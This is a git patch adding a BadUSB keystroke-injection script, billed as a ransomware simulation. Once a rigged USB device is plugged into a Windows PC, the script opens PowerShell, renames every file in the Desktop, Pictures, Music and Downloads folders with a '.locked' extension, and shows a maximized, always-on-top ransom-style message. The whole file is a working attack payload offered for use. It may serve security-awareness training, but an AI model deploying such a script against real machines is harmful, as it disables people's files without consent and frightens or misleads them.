From e8a708408e614b268093919b04b786a30b5c02de Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:27:41 -0400
Subject: [PATCH] Create RansomwareSimulation1.txt

---
 .../RansomwareSimulation1.txt                 | 91 +++++++++++++++++++
 1 file changed, 91 insertions(+)
 create mode 100644 BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt

diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt
new file mode 100644
index 00000000..b35bd533
--- /dev/null
+++ b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt
@@ -0,0 +1,91 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%                      This script was created by github.com/MarkCyber                               %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%    This script simulates a ransomware attack by changing file extensions and displays a message    %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%       Renaming file extensions renders each file unusable until the proper extension is added      %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%        Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions       %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 1000
+REM opens powershell (this is for windows machines)
+STRING powershell
+ENTER
+DELAY 3000
+REM Define the locations using correct SpecialFolder enumerations
+STRING $folders = @(
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Desktop,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyPictures,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyMusic,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Downloads
+DELAY 500
+ENTER
+DELAY 500
+STRING )
+DELAY 500
+ENTER
+DELAY 500
+REM Iterate over each location
+STRING foreach ($folder in $folders) {
+DELAY 500
+ENTER
+DELAY 500
+STRING $path = [Environment]::GetFolderPath($folder)
+DELAY 500
+ENTER
+DELAY 500
+REM Get all files in the path and rename them
+STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
+DELAY 500
+ENTER
+DELAY 500
+STRING }
+DELAY 500
+ENTER
+DELAY 2000
+REM Display ransomware message
+STRING Add-Type -AssemblyName PresentationFramework
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window = New-Object System.Windows.Window
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.WindowStartupLocation = 'CenterScreen'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.WindowState = 'Maximized'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.Topmost = $true
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.ShowDialog()
+DELAY 500
+ENTER
+DELAY 2000
+STRING exit
+DELAY 500
+ENTER
+REM check out my github at github.com/markcyber for more badusb & hacking type tools